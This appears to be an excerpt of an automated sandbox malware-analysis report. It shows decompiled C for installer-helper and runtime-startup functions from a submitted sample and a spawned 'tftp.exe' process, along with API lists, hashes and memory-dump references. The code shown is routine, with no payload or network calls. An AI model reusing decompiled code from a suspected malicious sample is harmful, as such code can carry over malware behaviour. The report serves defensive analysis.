SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E22
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E3C
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E4A

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: f720b70b0d635ca1f57644a8a0ea65d2b1c6a45dffdce1030f6556ee864f39e1
Instruction ID: 47d110ac8a5d848b8360d243fd416ef82f1fc4428da79922e5b1b26d8c92823d
Opcode Fuzzy Hash: f720b70b0d635ca1f57644a8a0ea65d2b1c6a45dffdce1030f6556ee864f39e1
Instruction Fuzzy Hash: C82190B1900148BBDB019FA5DD80EDEBFB9EF45354F14807AF604B6291C6388E809FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402B3B, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x792454; // 0x363211
					_t11 =  *0x7a6460; // 0x363215
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b48
0x00402b56
0x00402b5c
0x00402b5c
0x00402b6a
0x00402b6c
0x00402b72
0x00402b79
0x00402b7b
0x00402b7b
0x00402b91
0x00402ba1
0x00402bb3
0x00402bb3
0x00402bbb

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
MulDiv.KERNEL32(00363211,00000064,00363215), ref: 00402B81
wsprintfA.USER32 ref: 00402B91
SetWindowTextA.USER32(?,?), ref: 00402BA1
SetDlgItemTextA.USER32 ref: 00402BB3

Strings

verifying installer: %d%%, xrefs: 00402B8B

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 26e78c3d9df5a16786ed3cc69525262c0a3a935cb00965a02e1ab4ccdd4dd0e2
Instruction ID: ffd816cecff8be56212b11ff967eb8f2096358bc1c946807502b86a71eb66cdf
Opcode Fuzzy Hash: 26e78c3d9df5a16786ed3cc69525262c0a3a935cb00965a02e1ab4ccdd4dd0e2
Instruction Fuzzy Hash: 1F01677090020DBBDB149F60DD09FAE3779BB04745F008039FA16B92D1D7B8AA158F99

Uniqueness

Uniqueness Score: -1.00%

Function 00405C52, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C52(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405550(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E0040550E("*?|<>/\":", _t5))) == 0) {
							E00405688(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405c54
0x00405c5c
0x00405c70
0x00405c70
0x00405c76
0x00405c83
0x00405c83
0x00405c84
0x00405c86
0x00405c8a
0x00405c8c
0x00405c95
0x00405c97
0x00405cb1
0x00405cb9
0x00405cb9
0x00405cbe
0x00405cc0
0x00405cc2
0x00405cc6
0x00405cc7
0x00405cca
0x00405cd2
0x00405cd4
0x00405cd8
0x00000000
0x00000000
0x00405cde
0x00405ce3
0x00000000
0x00000000
0x00000000
0x00405ce3
0x00405ce8

APIs

CharNextA.USER32(?,*?|<>/":,00000000,007F8000,007EE000,007F8000,00000000,004030B6,007F8000,00000000,00403228), ref: 00405CAA
CharNextA.USER32(?,?,?,00000000), ref: 00405CB7
CharNextA.USER32(?,007F8000,007EE000,007F8000,00000000,004030B6,007F8000,00000000,00403228), ref: 00405CBC
CharPrevA.USER32(?,?,007EE000,007F8000,00000000,004030B6,007F8000,00000000,00403228), ref: 00405CCC

Strings

*?|<>/":, xrefs: 00405C9A

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
Instruction ID: 7689e4b4801a359f66f53c78b0d93180a9ac7ee38d4886d9260c1dcf5575a0d1
Opcode Fuzzy Hash: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
Instruction Fuzzy Hash: B311BF5180DB952EFB3216280C44B77BF99CB97B64F18487BE8C4722C2D67C5C429A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405577, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405577(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405329
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E0040550E(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}

0x00405580
0x00405580
0x00405587
0x0040558a
0x0040558f
0x004055a2
0x004055bc
0x00000000
0x004055bc
0x004055a6
0x004055a7
0x004055aa
0x004055ab
0x004055b3
0x00000000
0x00000000
0x004055b5
0x004055b8
0x00000000
0x00000000
0x00000000
0x004055b8
0x00000000
0x00405598
0x00000000
0x00405599

APIs

CharNextA.USER32()S@,?,007BA4B8,00000000,004055DB,007BA4B8,007BA4B8,?,?,00000000,00405329,?,007EE000,00000000), ref: 00405585
CharNextA.USER32(00000000), ref: 0040558A
CharNextA.USER32(00000000), ref: 00405599

Strings

)S@, xrefs: 00405580, 00405584

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: CharNext
String ID: )S@
API String ID: 3213498283-798485370
Opcode ID: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
Instruction ID: 986bac38fae6e29e8d308ce63eb2e299cdb348cdc64b8b0e232f7fb5ff74d272
Opcode Fuzzy Hash: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
Instruction Fuzzy Hash: 91F0A791D05A21B7F72222644C49B6F5BADDB59710F140477E100B61D592BC4C82CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402BBE, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BBE(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x79e458; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x7c56ac;
						if(_t2 >  *0x7c56ac) {
							_t3 = CreateDialogParamA( *0x7c56a0, 0x6f, 0, E00402B3B, 0);
							 *0x79e458 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405D4B(0);
					}
				} else {
					_t6 =  *0x79e458; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x79e458 = 0;
					return _t6;
				}
			}

0x00402bc5
0x00402bdf
0x00402be5
0x00402bef
0x00402bf5
0x00402bfb
0x00402c0c
0x00402c15
0x00000000
0x00402c1a
0x00402c21
0x00402be7
0x00402bee
0x00402bee
0x00402bc7
0x00402bc7
0x00402bce
0x00402bd1
0x00402bd1
0x00402bd7
0x00402bde
0x00402bde

APIs

DestroyWindow.USER32(00000000,00000000,00402D9E,00000001), ref: 00402BD1
GetTickCount.KERNEL32 ref: 00402BEF
CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C0C
ShowWindow.USER32(00000000,00000005), ref: 00402C1A

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 88874edf8a5ad3d13e020ee7241d07db47261e91eb3adacc12eef60140851430
Instruction ID: 80c895a4a2db25b88506b6249782dcc22a13088abbe972e09fee96e79beaf169
Opcode Fuzzy Hash: 88874edf8a5ad3d13e020ee7241d07db47261e91eb3adacc12eef60140851430
Instruction Fuzzy Hash: 3FF0DA309096A0ABD651AF14BD4CD9B7B64AB09B11750843BF400B62E8DA7C78C18AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405250, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405250(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x7bccb8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x7bccb8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405259
0x00405275
0x0040527d
0x00405282
0x00000000
0x00405288
0x0040528c

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007BCCB8,Error launching installer), ref: 00405275
CloseHandle.KERNEL32(?), ref: 00405282

Strings

Error launching installer, xrefs: 00405263

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: a806c5310e6df0cebd73b3ad197dac461c1311b4ac174aae17594d044691e1cb
Instruction ID: 0073a5a0efbfdaf5d9279cd3ea2a775c5bd0ec7cfa46b84911e87675a244a577
Opcode Fuzzy Hash: a806c5310e6df0cebd73b3ad197dac461c1311b4ac174aae17594d044691e1cb
Instruction Fuzzy Hash: E0E0ECB4904209ABEB019FA4DD09EAB7BBCFB14304B008526BD15E2250D778D4108A79

Uniqueness

Uniqueness Score: -1.00%

Function 0040563C, Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040563C(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x00405648
0x0040564a
0x00405672
0x00405657
0x0040565c
0x00405667
0x00000000
0x00405684
0x00405670
0x00405670
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,0040584A,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405643
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0040584A,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565C
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 0040566A
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,0040584A,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405673

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction ID: 609bff5e62adcd4a62841177b0e089267a8c05f8bacb5303162b42a917934155
Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction Fuzzy Hash: 97F05C36209C919FC2025B344C04E2F6F98EF92318B54097AF444F3140D3369C119BBF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: tftp.exe PID: 5720 Parent PID: 968 tftp.exeCOMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1052
Total number of Limit Nodes:	12

Executed Functions

Function 00401000, Relevance: 22.6, APIs: 15, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00401000(void* __edi, void* __esi) {
				char _v20;
				char _v24;
				char* _v48;
				char _v52;
				signed int** _v56;
				void* _v60;
				signed int _v76;
				intOrPtr _v100;
				void* __ebx;
				intOrPtr* _t27;
				_Unknown_base(*)()* _t28;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr* _t35;
				void* _t39;
				signed int _t42;
				intOrPtr _t53;
				void* _t54;
				signed int _t55;
				intOrPtr _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				signed int _t61;
				signed int _t62;
				intOrPtr* _t63;

				_t58 = __esi;
				_t57 = __edi;
				_t60 = _t59 - 0x38;
				_t27 =  *0x416a40; // 0x40b460
				if(_t27 != 0) {
					_v52 = 0;
					_v56 = 2;
					_v60 = 0;
					 *_t27();
					_t60 = _t60 - 0xc;
				}
				_v60 = 0x401110; // executed
				_t28 = SetUnhandledExceptionFilter(??); // executed
				_t61 = _t60 - 4;
				E0040B500();
				E0040B5E0(_t28);
				_v48 =  &_v20;
				_t31 =  *0x414320; // 0xffffffff
				_v60 = 0x419000;
				 *_t61 = 0x419004;
				_v20 = 0;
				_v52 = _t31;
				_v56 =  &_v24;
				L0040CEF8();
				_t33 =  *0x41da7c;
				if(_t33 != 0) {
					_t53 = __imp___iob;
					 *0x414324 = _t33;
					_v60 = _t33;
					 *_t61 =  *((intOrPtr*)(_t53 + 0x10));
					L0040CF00();
					_v60 =  *0x41da7c;
					 *_t61 =  *((intOrPtr*)(_t53 + 0x30));
					L0040CF00();
					_v60 =  *0x41da7c;
					_t33 =  *((intOrPtr*)(_t53 + 0x50));
					 *_t61 = _t33;
					L0040CF00();
				}
				L0040CF08();
				_t56 =  *0x414324; // 0x4000
				 *_t33 = _t56;
				E0040B760(_t53, _t57, _t58);
				_t62 = _t61 & 0xfffffff0;
				_t35 = E0040B9C0();
				L0040CF10();
				_v56 =  *_t35;
				_v60 =  *0x419000;
				 *_t62 =  *0x419004; // executed
				_t39 = E004135A0(_t56); // executed
				_t54 = _t39;
				L0040CF18();
				 *_t62 = _t54;
				ExitProcess(??);
				_push(_t54);
				_t63 = _t62 - 0x28;
				_t42 =  *( *_v56);
				if(_t42 > 0xc0000091) {
					if(_t42 == 0xc0000094) {
						_t55 = 0;
						goto L7;
					}
					if(_t42 == 0xc0000096) {
						goto L17;
					}
					if(_t42 != 0xc0000093) {
						goto L9;
					}
					goto L6;
				} else {
					if(_t42 < 0xc000008d) {
						if(_t42 == 0xc0000005) {
							_v100 = 0;
							 *_t63 = 0xb;
							L0040CF20();
							if(_t42 == 1) {
								_v100 = 1;
								 *_t63 = 0xb;
								L0040CF20();
								_t43 = _t42 | 0xffffffff;
								L10:
								return _t43;
							}
							if(_t42 == 0) {
								L9:
								_t43 = 0;
								goto L10;
							}
							 *_t63 = 0xb;
							 *_t42();
							_t43 = 0xffffffff;
							goto L10;
						}
						if(_t42 != 0xc000001d) {
							goto L9;
						}
						L17:
						_v100 = 0;
						 *_t63 = 4;
						L0040CF20();
						if(_t42 == 1) {
							_v100 = 1;
							 *_t63 = 4;
							L0040CF20();
							_t43 = _t42 | 0xffffffff;
							goto L10;
						}
						if(_t42 == 0) {
							goto L9;
						}
						 *_t63 = 4;
						 *_t42();
						_t43 = 0xffffffff;
						goto L10;
					}
					L6:
					_t55 = 1;
					L7:
					_v100 = 0;
					 *_t63 = 8;
					L0040CF20();
					if(_t42 == 1) {
						_v100 = 1;
						 *_t63 = 8;
						L0040CF20();
						_t43 = 0xffffffff;
						if(_t55 != 0) {
							_v76 = 0xffffffff;
							E0040B5E0(0xffffffff);
							_t43 = _v76;
						}
						goto L10;
					}
					if(_t42 != 0) {
						 *_t63 = 8;
						 *_t42();
						_t43 = 0xffffffff;
						goto L10;
					}
					goto L9;
				}
			}

0x00401000
0x00401000
0x00401001
0x00401004
0x0040100b
0x0040100d
0x00401015
0x0040101d
0x00401024
0x00401026
0x00401026
0x00401029
0x00401030
0x00401035
0x00401038
0x0040103d
0x00401046
0x0040104a
0x0040104f
0x00401057
0x0040105e
0x00401066
0x0040106e
0x00401072
0x00401077
0x0040107e
0x00401080
0x00401086
0x0040108b
0x00401092
0x00401095
0x0040109f
0x004010a6
0x004010a9
0x004010b3
0x004010b7
0x004010ba
0x004010bd
0x004010bd
0x004010c2
0x004010c7
0x004010cd
0x004010cf
0x004010d4
0x004010d7
0x004010dc
0x004010e3
0x004010ec
0x004010f5
0x004010f8
0x004010fd
0x004010ff
0x00401104
0x00401107
0x00401110
0x00401111
0x0040111a
0x00401121
0x00401165
0x004011b2
0x00000000
0x004011b2
0x0040116c
0x00000000
0x00000000
0x00401173
0x00000000
0x00000000
0x00000000
0x00401123
0x00401128
0x0040117c
0x004011c0
0x004011c8
0x004011cf
0x004011d7
0x00401223
0x0040122b
0x00401232
0x00401237
0x00401156
0x0040115a
0x0040115a
0x004011db
0x00401154
0x00401154
0x00000000
0x00401154
0x004011e1
0x004011e8
0x004011ea
0x00000000
0x004011ea
0x00401183
0x00000000
0x00000000
0x00401185
0x00401185
0x0040118d
0x00401194
0x0040119c
0x00401207
0x0040120f
0x00401216
0x0040121b
0x00000000
0x0040121b
0x004011a0
0x00000000
0x00000000
0x004011a2
0x004011a9
0x004011ab
0x00000000
0x004011ab
0x0040112a
0x0040112a
0x0040112f
0x0040112f
0x00401137
0x0040113e
0x00401146
0x00401240
0x00401248
0x0040124f
0x00401256
0x0040125b
0x00401261
0x00401265
0x0040126a
0x0040126a
0x00000000
0x0040125b
0x0040114e
0x004011f4
0x004011fb
0x004011fd
0x00000000
0x004011fd
0x00000000
0x0040114e

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004012B5), ref: 00401030
__getmainargs.MSVCRT ref: 00401072
_setmode.MSVCRT ref: 00401095
_setmode.MSVCRT ref: 004010A9
_setmode.MSVCRT ref: 004010BD
__p__fmode.MSVCRT ref: 004010C2
__p__environ.MSVCRT ref: 004010DC
_cexit.MSVCRT ref: 004010FF
ExitProcess.KERNEL32 ref: 00401107
signal.MSVCRT ref: 0040113E

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexitsignal
String ID:
API String ID: 2967348641-0
Opcode ID: 10f3081b918aff93ca2a6376dbe9ea5c76c1a5f408dd0fc1d7075df54863ee0e
Instruction ID: 9630e0df2e529400682b8d503dd047aeeaa09bc2630d11846ade366d371c0b72
Opcode Fuzzy Hash: 10f3081b918aff93ca2a6376dbe9ea5c76c1a5f408dd0fc1d7075df54863ee0e
Instruction Fuzzy Hash: 5C510AB0508301CFD714AF79C58575A76E0AB49358F118A3EE9A4AB3E1D77CD8848B4B

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD30, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 122
synchronizationstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 0040CD3F
memcpy.MSVCRT ref: 0040CD8D
CreateMutexA.KERNEL32 ref: 0040CDEE
WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040C31C), ref: 0040CE09
FindAtomA.KERNEL32 ref: 0040CE19
malloc.MSVCRT ref: 0040CE30
AddAtomA.KERNEL32 ref: 0040CE55
free.MSVCRT ref: 0040CE7E
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CE89
CloseHandle.KERNEL32 ref: 0040CE94

Strings

aaaa, xrefs: 0040CDB5
aaaa, xrefs: 0040CDBC
aaaa, xrefs: 0040CDA0
aaaa, xrefs: 0040CDAE
aaaa, xrefs: 0040CDA7
aaaa, xrefs: 0040CDC3
aaaa, xrefs: 0040CDCA

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: AtomMutex$CloseCreateFindHandleObjectReleaseSingleWaitfreemallocmemcpystrlen
String ID: aaaa$aaaa$aaaa$aaaa$aaaa$aaaa$aaaa
API String ID: 3576127839-3683700703
